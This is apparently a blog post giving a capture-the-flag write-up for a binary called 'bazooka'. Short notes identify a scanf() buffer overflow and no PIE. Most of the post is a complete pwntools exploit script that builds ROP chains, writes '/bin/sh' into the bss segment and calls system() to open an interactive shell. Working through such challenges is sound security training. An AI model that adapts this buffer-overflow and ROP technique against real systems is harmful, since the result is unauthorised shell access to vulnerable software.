bazooka

Binary

bazooka

Notes

  • scanf() BoF in vuln().
  • no-pie
  • Tried to find offset of /bin/sh in libc using libc leak and it seems like we are out of luck
  • Could use bss segment as code cave to write /bin/sh string
BoF
bss segment address 0x00601068
  1. Control PC using BOF
  2. Create a ROP chain to write “/bin/sh” in unused data section then jump back to vuln()
  3. Create a ROP chain to POP_RDI code cave(/bin/sh str) then jump to system() in the code

POC

from pwn import *
from Crypto.Util.number import long_to_bytes
from dataclasses import dataclass

class ROPGAD:
    POP_RDI = p64(0x00000000004008f3)
    RET = p64(0x0000000000400596)
    POP_RSI_POP_R15 = p64(0x4008f1)
    POP_RAX_CLUB_RDI = p64(0x400819)

def send_secret_msg(secret_msg: bytes):
    io.sendlineafter('message:', secret_msg)

def send_vuln_msg(vuln_msg: bytes):
    io.sendlineafter('Message: ', vuln_msg)

def send_junk_msg(junk_msg: bytes):
    io.sendlineafter('junk: ', junk_msg)


def create_scanf_rop(target_addr: int, ret_addr: int) -> bytes:
    SCANF = p64(0x40077e)
    rop_chain = (
        b''
        + ROPGAD.POP_RSI_POP_R15
        + p64(target_addr)
        + b'A' * 8
        + ROPGAD.RET
        + SCANF
        + p64(ret_addr)
    )

    return rop_chain



def control_pc(rop_chain: bytes):
    BUFFER_SIZE = 120
    bof = b'A'* BUFFER_SIZE

    secret = "#!@{try_hard3r}"
    send_secret_msg(secret)
    send_vuln_msg(bof + rop_chain)


def write_code_cave(code_cave_addr: int, msg: str, ret_addr: int):
    code_cave_ropchain = create_scanf_rop(code_cave_addr, ret_addr)
    control_pc(code_cave_ropchain)
    io.sendline(msg)

def create_system_sh(binsh_addr):
    SYSTEM = p64(0x4005c0)
    BINSH = p64(binsh_addr)
    rop_chain = (
        b''
        + ROPGAD.POP_RDI
        + BINSH
        + ROPGAD.RET
        + SYSTEM
    )

    return rop_chain



def main():
    VULN = 0x4006f7
    binsh_code_cave = 0x601068

    write_code_cave(binsh_code_cave, '/bin/sh', VULN)
    control_pc(create_system_sh(binsh_code_cave))

    io.interactive()

if __name__ == '__main__':
    io = process('pwn_bazooka_bazooka')

    context.log_level = 'debug'
    context.terminal = ['tmux', 'splitw', '-h']

    

    main()

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s